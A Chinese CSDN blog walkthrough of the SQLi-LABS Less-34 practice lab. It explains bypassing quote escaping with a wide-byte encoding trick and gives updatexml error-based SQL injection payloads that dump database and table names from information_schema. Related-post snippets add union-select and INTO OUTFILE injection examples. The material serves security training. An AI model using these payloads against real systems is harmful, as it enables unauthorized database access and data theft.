SQLi LABS Less-34 报错注入

士别三日wyx

已于 2024-06-23 11:21:21 修改

阅读量1.5w

点赞数 5

分类专栏：《靶场实战》文章标签：安全 web安全网络安全

于 2021-06-28 21:04:14 首次发布

本文链接：https://blog.csdn.net/wangyuxiang946/article/details/118311817

版权

《靶场实战》专栏收录该内容

92 篇文章 1 订阅

订阅专栏

「作者简介」：冬奥会网络安全中国代表队，CSDN Top100，就职奇安信多年，以实战工作为基础著作《网络安全自学教程》，适合基础薄弱的同学系统化的学习网络安全，用最短的时间掌握最核心的技术。

第三十四关注入点为单引号字符串型 , 注入类型为报错注入

此关卡通过代码WAF 将单引号' 转义成 /' , 我们使用编译绕过WAF , 先上结果

�' and updatexml(1,concat(0x7e,
substr((select group_concat(schema_name)
from information_schema.schemata),62,31)
),3) #

�' and updatexml(1,concat(0x7e,
substr((select group_concat(table_name)
from information_schema.tables
where table_schema=0x7365637572697479),1,31)
),3) #

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

士别三日wyx

关注关注

5
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
0
评论
SQLi LABS Less-34 报错注入

SQLi 第三十八关 SQLi38关
复制链接

扫一扫

专栏目录

sqli-labs-master靶场安装下载

04-01

安装phpstudy、sqli-labs 适合人群：小白安装sqli-labs报错如何解决

sqli-labs (less-34)

kukudeshuo的博客

03-14

1537

sqli-labs (less-34) 进入34关，我们发现又回到了我们熟悉的页面，我们直接输入用户名和密码登入进去像之前的关卡一样，我们输入的用户名和密码也是使用POST的方式传输到了服务器，所以我们继续使用hackbar工具抓取POST内容在用户名的位置我们输入一个单引号试试，结果发现单引号被转义那我们在密码的位置尝试输入一个单引号试试，结果发现也被转义这里一般情况下就已经没有注入点了，但我们可以查看源代码看看这关是不是也使用了GBK编码查看源代码可知确实使用了GBK编码，那就很简单

参与评论您还未登录，请先登录后发表或查看评论

SQL注入 Less34(POST型宽字节注入+布尔盲注)

开心星人的博客

07-28

680

因为"users"用到了引号，使用子查询或者16进制方式（这个出了点问题，没出来）发现没有效果，并且%df直接显示出来了（之前都是显示不出来，是一个问号的图形）我们用burp进行宽字节注入即可。抓包，发现对%进行了URL编码。进行了转义，使用宽字节注入。......

SQLi LABS Less-34_sqli-labs第三十四关，2024年最新网络安全性能优化面试题集锦

最新发布

2401_83974607的博客

04-18

426

【代码】SQLi LABS Less-34_sqli-labs第三十四关，2024年最新网络安全性能优化面试题集锦。

SQL-labs的第34关——报错注入宽字节注入（POST）

qq_73393033的博客

08-09

340

我们发现该网站会返回报错信息，直接使用报错注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包，进行注入，输入语句。出现报错，说明单引号逃逸成功。我们发现无法中和反斜杠。

sqli-labs————Less-34(宽字节绕过、水平越权、盲注）

Fly_鹏程万里

05-19

2507

Less-34方法一：这一关是POST型的注入，同样的将post传递过来的内容进行了转义处理，过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的，因此数据会通过urlencode,如何将方法用在POST型的注入当中呢？我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为： �'。我们可以利用这一点注...

Sqli-labs之Less-34

→_→

05-02

2194

Less-34 基于错误_POST_单引号_字符型_addslashes()_宽字节注入《注入天书》中介绍因 POST 不能进行 URLencode，可使用 UTF-8 转 UTF-16 或 UTF-32，实践中发现正常的宽字节注入仍有效，猜测是编码的问题，待解决。一个参考：...

sqli-labs-master.zip

11-20

jeakinscheung-sqli-labs-php7-master.zip

03-16

标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入（SQL Injection）练习平台的源代码库，专为PHP7优化。在描述中提到，用户在尝试创建数据库连接时遇到问题，可能是因为原始的SQL注入实验室...

sqlilabs过关手册注入天书，过关sqlliabs的绝佳手册

06-28

Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装将之前下载的源码解压到web目录下，linux的apache为 /var/www/html下，windows下的wamp解压在www目录下。修改sql-connections/db-creds.inc文件当中...

JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台漏洞(1)

2301_77033340的博客

04-15

345

【代码】JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台漏洞(1)

sqli-labs/Less-34

m0_71299382的博客

11-21

343

sqli-labs第三十四关

详细sqli-labs（1-65）通关讲解

热门推荐

dreamthe的博客

05-17

13万+

如果刚开始接触sql注入，那么sqli-labs这个靶场会很适合你，里面包含了很多的情景，以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ...

Sqli-labs靶场详细攻略Less 34-37

qq_41755084的博客

10-31

970

这一关还是进行宽字节注入，与上一关的区别在于使用了post方法进行传递。先试一下上一关的注入代码。因为这一关是登录，就使用之前的dumb账号。登陆失败了，也没报错，看一下这个包传递时post方法里参数是咋传的。可以看到，我们输入的注入代码在前端被进行了一个url编码，%被编码成了%25，原来的空格被替换成了+，原来的+被替换成了%2b那我们再把这个包改回来就好，+不用改回空格，在服务端会改回来的。并且经过尝试，这里的列数为2。注入成功。

sqli-labs-master前三十一到四十关过关总结

Alexz__的博客

02-13

844

第三十一关：换了个闭合第三十二关：数据库连接的致命性错误，导致二层ubuntu服务器mysql无法连接遂跳过第三十三关：这一关开始就可以回到我们的phpstudy了，不再需要jspstudy和ubuntu虚拟机的辅助发现我们的单引号前面被加了一个斜杠 \ 观察源码，发现此内容...

sqli-labs详细全解31-40

qq_38415434的博客

01-11

929

sqli-labs详细全解31-40 第三十一关: login.php 只对第一个参数进行了检测，而第二个参数并没有进行过滤。 payload:id=2&amp;amp;id=1&quot;) and 1=12-- - 第三十二关： f

sqli-labs靶场（23-38关）

weixin_51566481的博客

08-16

1159

sqli-labs,sql注入

sqli-labs 23-35闯关

小龙在线

09-24

605

第二十三关：过滤#和–注释+单引号闭合绕过+报错注入单引号闭合绕过注入 # 获取数据库 id=0' union select 1,2,database()' id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata where 1='1 # Your Password:information_schema,security # 获取数据库 id=0' union select 1,2,group_c

sqli-labs-less-7

09-26

sqli-labs less-7是一个web注入实验，它是用来学习SQL注入的。在这个实验中，我们需要使用不同的注入技术来绕过应用程序的安全措施，并从数据库中获取敏感信息。在这个具体的题目中，我们需要使用UNION SELECT语句来实现注入。根据引用和引用提供的信息，我们可以得出以下步骤： 1. 构造注入语句：在URL参数中使用单引号来闭合原始查询，然后使用UNION SELECT语句来执行额外的SQL查询。在这个例子中，注入语句是?id=-1')) union select 1,user(),database()。 2. 将查询结果导出到文件中：使用INTO OUTFILE语句将注入的查询结果导出到指定的文件路径。在这个例子中，查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。通过这些步骤，我们可以成功执行SQL注入攻击，并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交